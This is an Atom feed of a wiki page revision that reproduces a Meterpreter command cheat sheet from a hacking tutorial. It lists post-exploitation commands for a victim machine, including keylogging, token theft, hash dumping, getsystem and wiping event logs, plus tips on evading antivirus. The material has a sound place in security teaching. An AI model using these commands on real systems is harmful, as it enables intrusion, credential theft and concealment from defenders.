<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://lms.onnocenter.or.id/wiki/index.php?action=history&amp;feed=atom&amp;title=MSF%3A_meterpreter_command</id>
	<title>MSF: meterpreter command - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://lms.onnocenter.or.id/wiki/index.php?action=history&amp;feed=atom&amp;title=MSF%3A_meterpreter_command"/>
	<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=MSF:_meterpreter_command&amp;action=history"/>
	<updated>2026-04-20T15:59:39Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.45.1</generator>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=MSF:_meterpreter_command&amp;diff=52984&amp;oldid=prev</id>
		<title>Onnowpurbo: Created page with &quot;Sumber: https://null-byte.wonderhowto.com/how-to/hack-like-pro-ultimate-command-cheat-sheet-for-metasploits-meterpreter-0149146/  Step 1Core Commands  At its most basic use, m...&quot;</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=MSF:_meterpreter_command&amp;diff=52984&amp;oldid=prev"/>
		<updated>2018-12-07T22:21:18Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;Sumber: https://null-byte.wonderhowto.com/how-to/hack-like-pro-ultimate-command-cheat-sheet-for-metasploits-meterpreter-0149146/  Step 1Core Commands  At its most basic use, m...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;Sumber: https://null-byte.wonderhowto.com/how-to/hack-like-pro-ultimate-command-cheat-sheet-for-metasploits-meterpreter-0149146/&lt;br /&gt;
&lt;br /&gt;
Step 1Core Commands&lt;br /&gt;
&lt;br /&gt;
At its most basic use, meterpreter is a Linux terminal on the victim&amp;#039;s computer. As such, many of our basic Linux commands can be used on the meterpreter even if it&amp;#039;s on a Windows or other operating system.&lt;br /&gt;
&lt;br /&gt;
Here are some of the core commands we can use on the meterpreter.&lt;br /&gt;
&lt;br /&gt;
    ? - help menu&lt;br /&gt;
    background - moves the current session to the background&lt;br /&gt;
    bgkill - kills a background meterpreter script&lt;br /&gt;
    bglist - provides a list of all running background scripts&lt;br /&gt;
    bgrun - runs a script as a background thread&lt;br /&gt;
    channel - displays active channels&lt;br /&gt;
    close - closes a channel&lt;br /&gt;
    exit - terminates a meterpreter session&lt;br /&gt;
    help - help menu&lt;br /&gt;
    interact - interacts with a channel&lt;br /&gt;
    irb - go into Ruby scripting mode&lt;br /&gt;
    migrate - moves the active process to a designated PID&lt;br /&gt;
    quit - terminates the meterpreter session&lt;br /&gt;
    read - reads the data from a channel&lt;br /&gt;
    run - executes the meterpreter script designated after it&lt;br /&gt;
    use - loads a meterpreter extension&lt;br /&gt;
    write - writes data to a channel&lt;br /&gt;
&lt;br /&gt;
Step 2File System Commands&lt;br /&gt;
&lt;br /&gt;
    cat - read and output to stdout the contents of a file&lt;br /&gt;
    cd - change directory on the victim&lt;br /&gt;
    del - delete a file on the victim&lt;br /&gt;
    download - download a file from the victim system to the attacker system&lt;br /&gt;
    edit - edit a file with vim&lt;br /&gt;
    getlwd - print the local directory&lt;br /&gt;
    getwd - print working directory&lt;br /&gt;
    lcd - change local directory&lt;br /&gt;
    lpwd - print local directory&lt;br /&gt;
    ls - list files in current directory&lt;br /&gt;
    mkdir - make a directory on the victim system&lt;br /&gt;
    pwd - print working directory&lt;br /&gt;
    rm - delete a file&lt;br /&gt;
    rmdir - remove directory on the victim system&lt;br /&gt;
    upload - upload a file from the attacker system to the victim&lt;br /&gt;
&lt;br /&gt;
Step 3Networking Commands&lt;br /&gt;
&lt;br /&gt;
    ipconfig - displays network interfaces with key information including IP address, etc.&lt;br /&gt;
    portfwd - forwards a port on the victim system to a remote service&lt;br /&gt;
    route - view or modify the victim routing table&lt;br /&gt;
&lt;br /&gt;
Step 4System Commands&lt;br /&gt;
&lt;br /&gt;
    clearav - clears the event logs on the victim&amp;#039;s computer&lt;br /&gt;
    drop_token - drops a stolen token&lt;br /&gt;
    execute - executes a command&lt;br /&gt;
    getpid - gets the current process ID (PID)&lt;br /&gt;
    getprivs - gets as many privileges as possible&lt;br /&gt;
    getuid - get the user that the server is running as&lt;br /&gt;
    kill - terminate the process designated by the PID&lt;br /&gt;
    ps - list running processes&lt;br /&gt;
    reboot - reboots the victim computer&lt;br /&gt;
    reg - interact with the victim&amp;#039;s registry&lt;br /&gt;
    rev2self - calls RevertToSelf() on the victim machine&lt;br /&gt;
    shell - opens a command shell on the victim machine&lt;br /&gt;
    shutdown - shuts down the victim&amp;#039;s computer&lt;br /&gt;
    steal_token - attempts to steal the token of a specified (PID) process&lt;br /&gt;
    sysinfo - gets the details about the victim computer such as OS and name&lt;br /&gt;
&lt;br /&gt;
Step 5User Interface Commands&lt;br /&gt;
&lt;br /&gt;
    enumdesktops - lists all accessible desktops&lt;br /&gt;
    getdesktop - get the current meterpreter desktop&lt;br /&gt;
    idletime - checks to see how long since the victim system has been idle&lt;br /&gt;
    keyscan_dump - dumps the contents of the software keylogger&lt;br /&gt;
    keyscan_start - starts the software keylogger when associated with a process such as Word or browser&lt;br /&gt;
    keyscan_stop - stops the software keylogger&lt;br /&gt;
    screenshot - grabs a screenshot of the meterpreter desktop&lt;br /&gt;
    set_desktop - changes the meterpreter desktop&lt;br /&gt;
    uictl - enables control of some of the user interface components&lt;br /&gt;
&lt;br /&gt;
Step 6Privilege Escalation Commands&lt;br /&gt;
&lt;br /&gt;
    getsystem - uses 15 built-in methods to gain sysadmin privileges&lt;br /&gt;
&lt;br /&gt;
Step 7Password Dump Commands&lt;br /&gt;
&lt;br /&gt;
    hashdump - grabs the hashes in the password (SAM) file&lt;br /&gt;
&lt;br /&gt;
Note that hashdump will often trip AV software, but there are now two scripts that are more stealthy, &amp;quot;run hashdump&amp;quot; and &amp;quot;run smart_hashdump&amp;quot;. Look for more on those on my upcoming meterpreter script cheat sheet.&lt;br /&gt;
Step 8Timestomp Commands&lt;br /&gt;
&lt;br /&gt;
    timestomp - manipulates the modify, access, and create attributes of a file&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
&lt;br /&gt;
* https://null-byte.wonderhowto.com/how-to/hack-like-pro-ultimate-command-cheat-sheet-for-metasploits-meterpreter-0149146/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
&lt;br /&gt;
* [[Metasploit]]&lt;/div&gt;</summary>
		<author><name>Onnowpurbo</name></author>
	</entry>
</feed>